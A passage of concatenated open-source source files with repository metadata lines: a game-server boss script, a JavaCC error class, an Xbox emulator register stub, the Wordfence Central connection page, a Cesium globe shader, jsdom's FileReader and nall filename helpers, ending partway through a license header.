        class spell_algalon_cosmic_smash_damage_SpellScript : public SpellScript
        {
            PrepareSpellScript(spell_algalon_cosmic_smash_damage_SpellScript);

            void RecalculateDamage()
            {
                // Needs both an explicit destination and a hit unit to scale.
                if (!GetExplTargetDest() || !GetHitUnit())
                    return;

                float distance = GetHitUnit()->GetDistance2d(GetExplTargetDest()->GetPositionX(), GetExplTargetDest()->GetPositionY());
                if (distance > 6.0f)
                    // NOTE(review): the int32 cast binds only to (damage / distance),
                    // so truncation happens before the "* 2" — confirm this matches
                    // the intended falloff formula.
                    SetHitDamage(int32(float(GetHitDamage()) / distance) * 2);
            }

            void Register() override
            {
                OnHit += SpellHitFn(spell_algalon_cosmic_smash_damage_SpellScript::RecalculateDamage);
            }
        };

        SpellScript* GetSpellScript() const override
        {
            return new spell_algalon_cosmic_smash_damage_SpellScript();
        }
};
class spell_algalon_supermassive_fail : public SpellScriptLoader
{
public:
spell_algalon_supermassive_fail() : SpellScriptLoader("spell_algalon_supermassive_fail") { }
class spell_algalon_supermassive_fail_SpellScript : public SpellScript
{
PrepareSpellScript(spell_algalon_supermassive_fail_SpellScript);
void RecalculateDamage()
{
if (!GetHitPlayer())
return;
GetHitPlayer()->ResetAchievementCriteria(ACHIEVEMENT_CRITERIA_CONDITION_NO_SPELL_HIT, GetSpellInfo()->Id, true);
}
void Register() override
{
OnHit += SpellHitFn(spell_algalon_supermassive_fail_SpellScript::RecalculateDamage);
}
};
SpellScript* GetSpellScript() const override
{
return new spell_algalon_supermassive_fail_SpellScript();
}
};
// Criteria passes only if the target's AI reports DATA_HAS_FED_ON_TEARS == 0.
class achievement_he_feeds_on_your_tears : public AchievementCriteriaScript
{
    public:
        achievement_he_feeds_on_your_tears() : AchievementCriteriaScript("achievement_he_feeds_on_your_tears") { }

        // NOTE(review): target->GetAI() is dereferenced unchecked — assumes
        // the criteria can only fire against a scripted creature; confirm.
        bool OnCheck(Player* /*source*/, Unit* target) override
        {
            return !target->GetAI()->GetData(DATA_HAS_FED_ON_TEARS);
        }
};
// Registers every creature, gameobject, spell and achievement script defined
// in this file with the script manager.
void AddSC_boss_algalon_the_observer()
{
    new boss_algalon_the_observer();
    new npc_living_constellation();
    new npc_collapsing_star();
    new npc_brann_bronzebeard_algalon();
    new go_celestial_planetarium_access();
    new spell_algalon_phase_punch();
    new spell_algalon_arcane_barrage();
    new spell_algalon_trigger_3_adds();
    new spell_algalon_collapse();
    new spell_algalon_big_bang();
    new spell_algalon_remove_phase();
    new spell_algalon_cosmic_smash();
    new spell_algalon_cosmic_smash_damage();
    new spell_algalon_supermassive_fail();
    new achievement_he_feeds_on_your_tears();
}
| Effec7/Adamantium | src/server/scripts/Northrend/Ulduar/Ulduar/boss_algalon_the_observer.cpp | C++ | gpl-2.0 | 53,806 |
/* Generated By:JavaCC: Do not edit this line. TokenMgrError.java Version 5.0 */
/* JavaCCOptions: */
package pta.parser;
/** Token Manager Error. */
public class TokenMgrError extends Error
{
/**
* The version identifier for this Serializable class.
* Increment only if the <i>serialized</i> form of the
* class changes.
*/
private static final long serialVersionUID = 1L;
/*
* Ordinals for various reasons why an Error of this type can be thrown.
*/
/**
* Lexical error occurred.
*/
static final int LEXICAL_ERROR = 0;
/**
* An attempt was made to create a second instance of a static token manager.
*/
static final int STATIC_LEXER_ERROR = 1;
/**
* Tried to change to an invalid lexical state.
*/
static final int INVALID_LEXICAL_STATE = 2;
/**
* Detected (and bailed out of) an infinite loop in the token manager.
*/
static final int LOOP_DETECTED = 3;
/**
* Indicates the reason why the exception is thrown. It will have
* one of the above 4 values.
*/
int errorCode;
/**
* Replaces unprintable characters by their escaped (or unicode escaped)
* equivalents in the given string
*/
protected static final String addEscapes(String str) {
StringBuffer retval = new StringBuffer();
char ch;
for (int i = 0; i < str.length(); i++) {
switch (str.charAt(i))
{
case 0 :
continue;
case '\b':
retval.append("\\b");
continue;
case '\t':
retval.append("\\t");
continue;
case '\n':
retval.append("\\n");
continue;
case '\f':
retval.append("\\f");
continue;
case '\r':
retval.append("\\r");
continue;
case '\"':
retval.append("\\\"");
continue;
case '\'':
retval.append("\\\'");
continue;
case '\\':
retval.append("\\\\");
continue;
default:
if ((ch = str.charAt(i)) < 0x20 || ch > 0x7e) {
String s = "0000" + Integer.toString(ch, 16);
retval.append("\\u" + s.substring(s.length() - 4, s.length()));
} else {
retval.append(ch);
}
continue;
}
}
return retval.toString();
}
/**
* Returns a detailed message for the Error when it is thrown by the
* token manager to indicate a lexical error.
* Parameters :
* EOFSeen : indicates if EOF caused the lexical error
* curLexState : lexical state in which this error occurred
* errorLine : line number when the error occurred
* errorColumn : column number when the error occurred
* errorAfter : prefix that was seen before this error occurred
* curchar : the offending character
* Note: You can customize the lexical error message by modifying this method.
*/
protected static String LexicalError(boolean EOFSeen, int lexState, int errorLine, int errorColumn, String errorAfter, char curChar) {
return("Lexical error at line " +
errorLine + ", column " +
errorColumn + ". Encountered: " +
(EOFSeen ? "<EOF> " : ("\"" + addEscapes(String.valueOf(curChar)) + "\"") + " (" + (int)curChar + "), ") +
"after : \"" + addEscapes(errorAfter) + "\"");
}
/**
* You can also modify the body of this method to customize your error messages.
* For example, cases like LOOP_DETECTED and INVALID_LEXICAL_STATE are not
* of end-users concern, so you can return something like :
*
* "Internal Error : Please file a bug report .... "
*
* from this method for such cases in the release version of your parser.
*/
public String getMessage() {
return super.getMessage();
}
/*
* Constructors of various flavors follow.
*/
/** No arg constructor. */
public TokenMgrError() {
}
/** Constructor with message and reason. */
public TokenMgrError(String message, int reason) {
super(message);
errorCode = reason;
}
/** Full Constructor. */
public TokenMgrError(boolean EOFSeen, int lexState, int errorLine, int errorColumn, String errorAfter, char curChar, int reason) {
this(LexicalError(EOFSeen, lexState, errorLine, errorColumn, errorAfter, curChar), reason);
}
}
/* JavaCC - OriginalChecksum=3ba52b1aad3a7caf3b9352f06a64b532 (do not edit this line) */
| nicodelpiano/prism | src/pta/parser/TokenMgrError.java | Java | gpl-2.0 | 4,420 |
// This is an open source non-commercial project. Dear PVS-Studio, please check it.
// PVS-Studio Static Code Analyzer for C, C++ and C#: http://www.viva64.com
// ******************************************************************
// *
// * This file is part of the Cxbx project.
// *
// * Cxbx and Cxbe are free software; you can redistribute them
// * and/or modify them under the terms of the GNU General Public
// * License as published by the Free Software Foundation; either
// * version 2 of the license, or (at your option) any later version.
// *
// * This program is distributed in the hope that it will be useful,
// * but WITHOUT ANY WARRANTY; without even the implied warranty of
// * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// * GNU General Public License for more details.
// *
// * You should have recieved a copy of the GNU General Public License
// * along with this program; see the file COPYING.
// * If not, write to the Free Software Foundation, Inc.,
// * 59 Temple Place - Suite 330, Bostom, MA 02111-1307, USA.
// *
// * This file is heavily based on code from XQEMU
// * https://github.com/xqemu/xqemu/blob/master/hw/xbox/nv2a/nv2a_stubs.c
// * Copyright (c) 2012 espes
// * Copyright (c) 2015 Jannik Vogel
// * Copyright (c) 2018 Matt Borgerson
// *
// * Contributions for Cxbx-Reloaded
// * Copyright (c) 2017-2018 Luke Usher <luke.usher@outlook.com>
// * Copyright (c) 2018 Patrick van Logchem <pvanlogchem@gmail.com>
// *
// * All rights reserved
// *
// ******************************************************************
// TODO: Remove disabled warning once case are add to PSTRAPS switch.
#pragma warning(push)
#pragma warning(disable: 4065)
// PSTRAPS block: no registers are emulated yet, so every read is reported
// through the unhandled-access logger before DEVICE_READ32_END completes
// the access.
DEVICE_READ32(PSTRAPS)
{
	DEVICE_READ32_SWITCH() {

	default:
		DEBUG_READ32_UNHANDLED(PSTRAPS);
		break;
	}

	DEVICE_READ32_END(PSTRAPS);
}
#pragma warning(pop)
// TODO: Remove disabled warning once case are add to PSTRAPS switch.
#pragma warning(push)
#pragma warning(disable: 4065)
// PSTRAPS block: writes are likewise unhandled and only logged.
// NOTE(review): the read handler uses the DEVICE_READ32_SWITCH() macro while
// this uses a bare switch (addr) — confirm no DEVICE_WRITE32 switch macro is
// expected here for consistency.
DEVICE_WRITE32(PSTRAPS)
{
	switch (addr) {

	default:
		DEBUG_WRITE32_UNHANDLED(PSTRAPS);
		break;
	}

	DEVICE_WRITE32_END(PSTRAPS);
}
#pragma warning(pop)
| Cxbx-Reloaded/Cxbx-Reloaded | src/devices/video/EmuNV2A_PSTRAPS.cpp | C++ | gpl-2.0 | 2,158 |
<?php
// Bail out when this template is loaded outside the Wordfence plugin bootstrap.
if (!defined('WORDFENCE_VERSION')) {
	exit;
}

/**
 * @var string $subpage
 */

// Human-readable label for each step of the Central connection handshake,
// keyed by step number (mirrors the JS installer steps further below).
$stepContent = array(
	1 => __('Testing initial communication with Wordfence Central.', 'wordfence'),
	2 => __('Passing public key to Wordfence Central.', 'wordfence'),
	3 => __('Testing public key authentication with Wordfence Central.', 'wordfence'),
	4 => __('Testing that Wordfence Central is able to communicate with this site.', 'wordfence'),
	5 => __('Retrieving access token using authorization grant.', 'wordfence'),
	6 => __('Redirecting back to Wordfence Central.', 'wordfence'),
);

// Connection state decides which of the template branches below renders.
$connected = wfCentral::isConnected();
$partialConnection = wfCentral::isPartialConnection();
?>
<?php
// Onboarding / GDPR overlays take precedence over the page content.
if (wfOnboardingController::shouldShowAttempt3()) {
	echo wfView::create('onboarding/disabled-overlay')->render();
	echo wfView::create('onboarding/banner')->render();
} else if (wfConfig::get('touppPromptNeeded')) {
	echo wfView::create('gdpr/disabled-overlay')->render();
	echo wfView::create('gdpr/banner')->render();
}

// Multisite installs link to the network admin screen instead.
if (function_exists('network_admin_url') && is_multisite()) {
	$wordfenceURL = network_admin_url('admin.php?page=Wordfence');
}
else {
	$wordfenceURL = admin_url('admin.php?page=Wordfence');
}
?>
<div class="wrap wordfence">
<div class="wf-container-fluid">
<div class="wf-row">
<div class="wf-col-xs-12">
<div class="wp-header-end"></div>
<?php
echo wfView::create('common/section-title', array(
'title' => __('Wordfence Central', 'wordfence'),
'showIcon' => true,
))->render();
?>
</div>
<?php if ($connected): ?>
<div class="wf-col-xs-12 wf-central-connected">
<div class="wf-flex-row wf-flex-grow-all">
<div class="wf-flex-row-1 wf-block wf-active">
<div class="wf-central-dashboard">
<img class="wf-central-dashboard-logo" src="<?php echo wfUtils::getBaseURL() ?>images/wf-central-logo.svg" alt="Wordfence Central">
<div class="wf-central-dashboard-copy">
<p><strong><?php _e('Wordfence Central', 'wordfence') ?></strong></p>
<p><?php _e('Wordfence Central allows you to manage Wordfence on multiple sites from one location. It makes security monitoring and configuring Wordfence easier.', 'wordfence') ?></p>
<p class="wf-right-lg"><a href="https://www.wordfence.com/central" target="_blank" rel="noopener noreferrer"><strong><?php _e('Visit Wordfence Central', 'wordfence') ?></strong></a></p>
</div>
</div>
</div>
<div class="wf-flex-row-1 wf-block wf-active">
<p><strong><?php _e('Wordfence Central Status', 'wordfence') ?></strong></p>
<p><?php printf(__('Activated - connected by %s on %s', 'wordfence'), esc_html(wfConfig::get('wordfenceCentralConnectEmail')), date_i18n('F j, Y', (int) wfConfig::get('wordfenceCentralConnectTime'))) ?></p>
<p class="wf-right-lg"><a href="<?php echo esc_url($wordfenceURL); ?>"><strong><?php _e('Disconnect This Site', 'wordfence') ?></strong></a></p>
</div>
</div>
</div>
<?php elseif (isset($_GET['grant'])): ?>
<div class="wf-col-xs-12">
<div class="wf-block wf-active">
<div class="wf-block-header">
<div class="wf-block-header-content">
<strong><?php _e('Wordfence Central Installation Process') ?></strong>
</div>
</div>
<div class="wf-block-content">
<ul class="wf-block-list" id="wf-central-progress">
<?php for ($i = 1; $i <= 6; $i++): ?>
<li id="wf-central-progress-step<?php echo $i ?>" class="pending">
<div class="wf-central-progress-icon">
<div class="wf-step-pending"></div>
<div class="wf-step-running">
<?php
echo wfView::create('common/indeterminate-progress', array(
'size' => 50,
))->render();
?>
</div>
<div class="wf-step-complete-success"></div>
<div class="wf-step-complete-warning"></div>
</div>
<div class="wf-central-progress-content">
<p><?php echo esc_html($stepContent[$i]) ?></p>
</div>
</li>
<?php endfor ?>
</ul>
</div>
</div>
</div>
<?php elseif ($partialConnection): ?>
<div class="wf-center-lg">
<p><?php _e('It looks like you\'ve tried to connect this site to Wordfence Central, but the installation did not finish.', 'wordfence') ?></p>
<p>
<a href="<?php echo WORDFENCE_CENTRAL_URL_SEC ?>/sites/connection-issues?complete-setup=<?php echo esc_attr(wfConfig::get('wordfenceCentralSiteID')) ?>"
class="wf-btn wf-btn-primary"
><?php _e('Resume Installation', 'wordfence') ?></a>
<a href="<?php echo esc_url($wordfenceURL); ?>" class="wf-btn wf-btn-warning"><?php _e('Disconnect Site', 'wordfence') ?></a>
</p>
</div>
<?php else: ?>
	<?php /* Not connected and no pending grant: offer the initial connect link.
	        Fixed duplicated words ("your site your site") in the visible string;
	        the msgid change means translations need updating. */ ?>
	<div class="wf-center-lg">
		<p><?php _e('Wordfence Central allows you to manage Wordfence on multiple sites from one location. It makes security monitoring and configuring Wordfence easier.', 'wordfence') ?></p>
		<p><?php _e('To connect your site to Wordfence Central, use the link below:', 'wordfence') ?></p>
		<p class="wf-center">
			<a href="<?php echo WORDFENCE_CENTRAL_URL_SEC ?>?newsite=<?php echo esc_attr(home_url()) ?>" class="wf-btn wf-btn-primary"><?php _e('Connect Site', 'wordfence') ?></a>
		</p>
	</div>
<?php endif ?>
</div>
</div>
</div>
<script>
(function($) {
    // Values injected by PHP at render time: the one-time auth grant from the
    // query string, the last completed installer step, and connection state.
    var authGrant = '<?php echo esc_js(isset($_GET['grant']) ? $_GET['grant'] : '') ?>';
    var currentStep = <?php echo json_encode(wfConfig::getInt('wordfenceCentralCurrentStep', 1)) ?>;
    var connected = <?php echo json_encode($connected) ?>;

    // Surface an installer error to the user via a colorbox dialog.
    function wfConnectError(error) {
        WFAD.colorboxError(error);
    }

    // Run one installer step via admin-ajax and update its progress row.
    //   step   - suffix of the progress <li> id, e.g. "step1"
    //   action - AJAX action name; data - payload
    //   cb     - success callback; cbErr - transport-failure callback
    // NOTE(review): when the server replies with `response.err`, the row is
    // marked as a warning but neither cb nor cbErr is invoked — confirm that
    // the installer is meant to simply stall in that case.
    function wfCentralStepAjax(step, action, data, cb, cbErr, noLoading) {
        var el = $('#wf-central-progress-' + step);
        el.removeClass('pending')
            .addClass('running');

        WFAD.ajax(action, data, function(response) {
            if (response && response.success) {
                el.removeClass('running')
                    .addClass('complete-success');
                cb && cb(response);
            } else if (response && response.err) {
                el.removeClass('running')
                    .addClass('complete-warning');
            }

        }, function(response) {
            el.removeClass('running')
                .addClass('complete-warning');
            cbErr && cbErr(response);
        }, noLoading);
    }

    var WFCentralInstaller = {};
    window.WFCentralInstaller = WFCentralInstaller;

    // Step 1: Makes GET request to `/central/api/site/access-token` endpoint authenticated with the auth grant supplied by the user.
    // - Receives site GUID, public key, short lived JWT.
    WFCentralInstaller.step1 = function() {
        wfCentralStepAjax('step1', 'wordfence_wfcentral_step1', {
            'auth-grant': authGrant
        }, function(response) {
            $(window).trigger('step2', response);
        }, wfConnectError);
    };

    // Step 2: Makes PATCH request to `/central/api/wf/site/<guid>` endpoint passing in the new public key.
    // Uses JWT from auth grant endpoint as auth.
    WFCentralInstaller.step2 = function() {
        wfCentralStepAjax('step2', 'wordfence_wfcentral_step2', {}, function(response) {
            $(window).trigger('step3', response);
        }, wfConnectError);
    };
    $(window).on('step2', WFCentralInstaller.step2);

    // Step 3: Makes GET request to `/central/api/wf/site/<guid>` endpoint signed using Wordfence plugin private key.
    // - Expects 200 response with site data.
    // On success, polls step 4 every 4 seconds until the reverse request from
    // Central is observed (step 4 clears the interval).
    WFCentralInstaller.step3 = function() {
        wfCentralStepAjax('step3', 'wordfence_wfcentral_step3', {}, function(response) {
            var callback = function() {
                $(window).trigger('step4')
            };
            var interval = setInterval(callback, 4000);
            $(window).on('step3-clearInterval', function() {
                clearInterval(interval);
            });
            callback();
        }, wfConnectError);
    };
    $(window).on('step3', WFCentralInstaller.step3);

    // Step 4: Poll for PUT request at `/wp-json/wp/v2/wordfence-auth-grant/` endpoint signed using Wordfence Central private key with short lived JWT.
    // - Expects verifiable signature of incoming request from Wordfence Central.
    // - Stores auth grant JWT.
    WFCentralInstaller.step4 = function() {
        wfCentralStepAjax('step4', 'wordfence_wfcentral_step4', {}, function(response) {
            if (response && response.success) {
                $(window).trigger('step3-clearInterval');
                $(window).trigger('step5');
            }
        }, wfConnectError);
    };
    $(window).on('step4', WFCentralInstaller.step4);

    // Step 5: Makes GET request to `/central/api/site/<guid>/access-token` endpoint signed using Wordfence plugin private key with auth grant JWT.
    // - Expects 200 response with access token.
    WFCentralInstaller.step5 = function() {
        wfCentralStepAjax('step5', 'wordfence_wfcentral_step5', {
            'auth-grant': authGrant
        }, function(response) {
            $(window).trigger('step6', response);
        }, wfConnectError);
    };
    $(window).on('step5', WFCentralInstaller.step5);

    // Step 6: Installation complete. Redirect user back to Wordfence Central with access token.
    WFCentralInstaller.step6 = function(response) {
        wfCentralStepAjax('step6', 'wordfence_wfcentral_step6', {}, function(response) {
            document.location.href = response['redirect-url'];
        }, wfConnectError);
    };
    $(window).on('step6', WFCentralInstaller.step6);

    // NOTE(review): `self` appears unused below — candidate for removal.
    var self = this;
    $(function() {
        // if (!authGrant) {
        // 	wfConnectError('Auth grant not found.');
        // 	return;
        // }

        // Mark the already-completed steps as successful, then resume the
        // installer from the persisted current step.
        if (!connected && authGrant) {
            for (var i = 0; i < currentStep; i++) {
                var el = $('#wf-central-progress-step' + i);
                el.removeClass('pending')
                    .addClass('complete-success');
            }
            WFCentralInstaller['step' + currentStep]();
        }
    });
})(jQuery);
</script>
| Redcolaborar/Red-Colaborar | wp-content/plugins/wordfence/lib/menu_wordfence_central.php | PHP | gpl-3.0 | 9,727 |
//This file is automatically rebuilt by the Cesium build process.
/*global define*/
define(function() {
    "use strict";
    // AMD module returning the GLSL vertex shader source for globe surface
    // tiles. The string below is emitted verbatim by the Cesium shader build
    // step (see the header comment) — it is regenerated on rebuild, so the
    // GLSL text must not be edited here.
    return "attribute vec4 position3DAndHeight;\n\
attribute vec3 textureCoordAndEncodedNormals;\n\
\n\
uniform vec3 u_center3D;\n\
uniform mat4 u_modifiedModelView;\n\
uniform vec4 u_tileRectangle;\n\
\n\
// Uniforms for 2D Mercator projection\n\
uniform vec2 u_southAndNorthLatitude;\n\
uniform vec2 u_southMercatorYAndOneOverHeight;\n\
\n\
varying vec3 v_positionMC;\n\
varying vec3 v_positionEC;\n\
\n\
varying vec2 v_textureCoordinates;\n\
varying vec3 v_normalMC;\n\
varying vec3 v_normalEC;\n\
\n\
#ifdef FOG\n\
varying float v_distance;\n\
varying vec3 v_mieColor;\n\
varying vec3 v_rayleighColor;\n\
#endif\n\
\n\
// These functions are generated at runtime.\n\
vec4 getPosition(vec3 position3DWC);\n\
float get2DYPositionFraction();\n\
\n\
vec4 getPosition3DMode(vec3 position3DWC)\n\
{\n\
return czm_projection * (u_modifiedModelView * vec4(position3DAndHeight.xyz, 1.0));\n\
}\n\
\n\
float get2DMercatorYPositionFraction()\n\
{\n\
// The width of a tile at level 11, in radians and assuming a single root tile, is\n\
// 2.0 * czm_pi / pow(2.0, 11.0)\n\
// We want to just linearly interpolate the 2D position from the texture coordinates\n\
// when we're at this level or higher. The constant below is the expression\n\
// above evaluated and then rounded up at the 4th significant digit.\n\
const float maxTileWidth = 0.003068;\n\
float positionFraction = textureCoordAndEncodedNormals.y;\n\
float southLatitude = u_southAndNorthLatitude.x;\n\
float northLatitude = u_southAndNorthLatitude.y;\n\
if (northLatitude - southLatitude > maxTileWidth)\n\
{\n\
float southMercatorY = u_southMercatorYAndOneOverHeight.x;\n\
float oneOverMercatorHeight = u_southMercatorYAndOneOverHeight.y;\n\
\n\
float currentLatitude = mix(southLatitude, northLatitude, textureCoordAndEncodedNormals.y);\n\
currentLatitude = clamp(currentLatitude, -czm_webMercatorMaxLatitude, czm_webMercatorMaxLatitude);\n\
positionFraction = czm_latitudeToWebMercatorFraction(currentLatitude, southMercatorY, oneOverMercatorHeight);\n\
} \n\
return positionFraction;\n\
}\n\
\n\
float get2DGeographicYPositionFraction()\n\
{\n\
return textureCoordAndEncodedNormals.y;\n\
}\n\
\n\
vec4 getPositionPlanarEarth(vec3 position3DWC, float height2D)\n\
{\n\
float yPositionFraction = get2DYPositionFraction();\n\
vec4 rtcPosition2D = vec4(height2D, mix(u_tileRectangle.st, u_tileRectangle.pq, vec2(textureCoordAndEncodedNormals.x, yPositionFraction)), 1.0);  \n\
return czm_projection * (u_modifiedModelView * rtcPosition2D);\n\
}\n\
\n\
vec4 getPosition2DMode(vec3 position3DWC)\n\
{\n\
return getPositionPlanarEarth(position3DWC, 0.0);\n\
}\n\
\n\
vec4 getPositionColumbusViewMode(vec3 position3DWC)\n\
{\n\
return getPositionPlanarEarth(position3DWC, position3DAndHeight.w);\n\
}\n\
\n\
vec4 getPositionMorphingMode(vec3 position3DWC)\n\
{\n\
// We do not do RTC while morphing, so there is potential for jitter.\n\
// This is unlikely to be noticeable, though.\n\
float yPositionFraction = get2DYPositionFraction();\n\
vec4 position2DWC = vec4(0.0, mix(u_tileRectangle.st, u_tileRectangle.pq, vec2(textureCoordAndEncodedNormals.x, yPositionFraction)), 1.0);\n\
vec4 morphPosition = czm_columbusViewMorph(position2DWC, vec4(position3DWC, 1.0), czm_morphTime);\n\
return czm_modelViewProjection * morphPosition;\n\
}\n\
\n\
void main() \n\
{\n\
vec3 position3DWC = position3DAndHeight.xyz + u_center3D;\n\
\n\
gl_Position = getPosition(position3DWC);\n\
\n\
#if defined(ENABLE_VERTEX_LIGHTING)\n\
v_positionEC = (czm_modelView3D * vec4(position3DWC, 1.0)).xyz;\n\
v_positionMC = position3DWC;  // position in model coordinates\n\
float encodedNormal = textureCoordAndEncodedNormals.z;\n\
v_normalMC = czm_octDecode(encodedNormal);\n\
v_normalEC = czm_normal3D * v_normalMC;\n\
#elif defined(SHOW_REFLECTIVE_OCEAN) || defined(ENABLE_DAYNIGHT_SHADING)\n\
v_positionEC = (czm_modelView3D * vec4(position3DWC, 1.0)).xyz;\n\
v_positionMC = position3DWC;  // position in model coordinates\n\
#endif\n\
\n\
v_textureCoordinates = textureCoordAndEncodedNormals.xy;\n\
\n\
#ifdef FOG\n\
AtmosphereColor atmosColor = computeGroundAtmosphereFromSpace(position3DWC);\n\
v_mieColor = atmosColor.mie;\n\
v_rayleighColor = atmosColor.rayleigh;\n\
v_distance = length((czm_modelView3D * vec4(position3DWC, 1.0)).xyz);\n\
#endif\n\
}";
}); | nupic-community/nostradamIQ | nostradamIQ-landingpage/webapp/lib/cesium/1.16/Source/Shaders/GlobeVS.js | JavaScript | gpl-3.0 | 4,687 |
"use strict";
const whatwgEncoding = require("whatwg-encoding");
const parseContentType = require("content-type-parser");
const querystring = require("querystring");
const DOMException = require("domexception");
const EventTargetImpl = require("../events/EventTarget-impl").implementation;
const ProgressEvent = require("../generated/ProgressEvent");
const { setupForSimpleEventAccessors } = require("../helpers/create-event-accessor");
// FileReader ready states per the File API spec.
const READY_STATES = Object.freeze({
  EMPTY: 0,
  LOADING: 1,
  DONE: 2
});

// Progress-event names for which on<event> accessors are generated below.
const events = ["loadstart", "progress", "load", "abort", "error", "loadend"];

// Implementation class backing jsdom's FileReader wrapper.
class FileReaderImpl extends EventTargetImpl {
  constructor(args, privateData) {
    super([], privateData);

    this.error = null;
    this.readyState = READY_STATES.EMPTY;
    this.result = null;

    this._ownerDocument = privateData.window.document;
    // Set while an abort is pending so the queued read callbacks bail out.
    this._terminated = false;
  }

  // Read `file` and expose the result as an ArrayBuffer.
  readAsArrayBuffer(file) {
    this._readFile(file, "buffer");
  }

  // Read `file` and expose the result as a data: URL string.
  readAsDataURL(file) {
    this._readFile(file, "dataURL");
  }

  // Read `file` and expose the result as text decoded with `encoding`
  // (defaults to UTF-8 when the label is missing or unrecognized).
  readAsText(file, encoding) {
    this._readFile(file, "text", whatwgEncoding.labelToName(encoding) || "UTF-8");
  }

  // Cancel an in-flight read; fires "abort" then "loadend".
  abort() {
    if (this.readyState === READY_STATES.EMPTY || this.readyState === READY_STATES.DONE) {
      this.result = null;
      return;
    }

    if (this.readyState === READY_STATES.LOADING) {
      this.readyState = READY_STATES.DONE;
      this.result = null;
    }

    this._terminated = true;
    this._fireProgressEvent("abort");
    this._fireProgressEvent("loadend");
  }

  // Dispatch a ProgressEvent of the given name on this reader.
  _fireProgressEvent(name, props) {
    const event = ProgressEvent.createImpl([name, Object.assign({ bubbles: false, cancelable: false }, props)], {});
    this.dispatchEvent(event);
  }

  // Shared read machinery: `format` is "buffer" | "dataURL" | "text";
  // `encoding` is only supplied by readAsText.
  _readFile(file, format, encoding) {
    if (this.readyState === READY_STATES.LOADING) {
      throw new DOMException("The object is in an invalid state.", "InvalidStateError");
    }
    this.readyState = READY_STATES.LOADING;

    setImmediate(() => {
      if (this._terminated) {
        this._terminated = false;
        return;
      }

      this._fireProgressEvent("loadstart");

      let data = file._buffer;
      if (!data) {
        data = Buffer.alloc(0);
      }
      this._fireProgressEvent("progress", {
        lengthComputable: !isNaN(file.size),
        total: file.size,
        loaded: data.length
      });

      setImmediate(() => {
        if (this._terminated) {
          this._terminated = false;
          return;
        }

        switch (format) {
          // Unknown formats fall through to the ArrayBuffer branch.
          default:
          case "buffer": {
            this.result = (new Uint8Array(data)).buffer;
            break;
          }
          case "dataURL": {
            let dataUrl = "data:";
            const contentType = parseContentType(file.type);
            if (contentType && contentType.isText()) {
              const fallbackEncoding = whatwgEncoding.getBOMEncoding(data) ||
                whatwgEncoding.labelToName(contentType.get("charset")) || "UTF-8";
              const decoded = whatwgEncoding.decode(data, fallbackEncoding);

              // NOTE(review): `encoding` is undefined on the readAsDataURL
              // path (only readAsText passes it), so the charset written
              // here may be bogus — confirm against the File API spec.
              contentType.set("charset", encoding);
              dataUrl += contentType.toString();
              dataUrl += ",";
              // NOTE(review): percent-encoding via querystring.escape rather
              // than base64 for text types — verify this matches consumers.
              dataUrl += querystring.escape(decoded);
            } else {
              if (contentType) {
                dataUrl += contentType.toString();
              }
              dataUrl += ";base64,";
              dataUrl += data.toString("base64");
            }
            this.result = dataUrl;
            break;
          }
          case "text": {
            this.result = whatwgEncoding.decode(data, encoding);
            break;
          }
        }
        this.readyState = READY_STATES.DONE;
        this._fireProgressEvent("load");
        this._fireProgressEvent("loadend");
      });
    });
  }
}

setupForSimpleEventAccessors(FileReaderImpl.prototype, events);

exports.implementation = FileReaderImpl;
| FreezeWarp/freeze-messenger | stress/node_modules/jsdom/lib/jsdom/living/file-api/FileReader-impl.js | JavaScript | gpl-3.0 | 3,919 |
#ifdef NALL_STRING_INTERNAL_HPP
namespace nall {
// Returns the directory portion, keeping the trailing slash:
// "/foo/bar.c" -> "/foo/"
// "/foo/"      -> "/foo/"
// "bar.c"      -> "./"
string dir(string name) {
  signed i = name.length();
  while(i >= 0) {
    if(name[i] == '/' || name[i] == '\\') {
      name.resize(i + 1);
      break;
    }
    if(i == 0) {
      name = "./";  //no separator at all: treat as current directory
      break;
    }
    i--;
  }
  return name;
}
// Returns everything after the final path separator:
// "/foo/bar.c" -> "bar.c"
// "/foo/"      -> ""
// "bar.c"      -> "bar.c"
string notdir(string name) {
  signed i = name.length();
  while(i >= 0) {
    if(name[i] == '/' || name[i] == '\\') return (const char*)name + i + 1;
    i--;
  }
  return name;  //no separator: the whole name is the file part
}
// Strips the last path component, keeping the trailing slash:
// "/foo/bar/baz" -> "/foo/bar/"
// "/foo/bar/"    -> "/foo/"
// "/foo/bar"     -> "/foo/"
// Names with fewer than two separators are returned unchanged.
string parentdir(string name) {
  // prev/last are zero-initialized: the original left them uninitialized and
  // read them below for names with zero or one separators (undefined behavior).
  unsigned length = name.length(), paths = 0, prev = 0, last = 0;
  for(unsigned i = 0; i < length; i++) {
    if(name[i] == '/' || name[i] == '\\') {
      paths++;
      prev = last;
      last = i;
    }
  }
  if(last + 1 == length) last = prev;  //if name ends in slash; use previous slash
  if(paths > 1) name.resize(last + 1);
  return name;
}
// "/foo/bar.c" -> "/foo/bar"
// Strips the extension from the final path component; scanning backwards and
// stopping at a separator means dots in directory names are left untouched.
string basename(string name) {
  for(signed i = name.length(); i >= 0; i--) {
    if(name[i] == '/' || name[i] == '\\') break;  //file has no extension
    if(name[i] == '.') {
      name.resize(i);
      break;
    }
  }
  return name;
}
// "/foo/bar.c" -> "c"
// "/foo/bar"   -> ""
// Returns the extension (text after the last '.') of the final path
// component, or the empty string when there is none.
string extension(string name) {
  for(signed i = name.length(); i >= 0; i--) {
    if(name[i] == '/' || name[i] == '\\') return "";  //file has no extension
    if(name[i] == '.') {
      return (const char*)name + i + 1;
    }
  }
  return name;
}
// Returns a not-yet-existing filename of the form
// <temppath>.temporary-XXXXXXXX (hex-suffixed), looping until one is free.
string tempname() {
  string path = temppath();
  // NOTE(review): srand(time(...)) reseeds on every call, so two calls within
  // the same second walk the same rand() sequence — consider a stronger source.
  srand(time(nullptr));
  while(true) {
    uint32_t seed = rand();
    string filename = {path, ".temporary-", hex<8>(seed)};
    // NOTE(review): access() check is racy (TOCTOU) — the name may be taken
    // by another process before the caller creates the file.
    if(access(filename, F_OK) != 0) return filename;
  }
}
}
#endif
| libretro/bsnes-mercury | nall/string/filename.hpp | C++ | gpl-3.0 | 1,852 |
/*
* Copyright (C) 2014 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
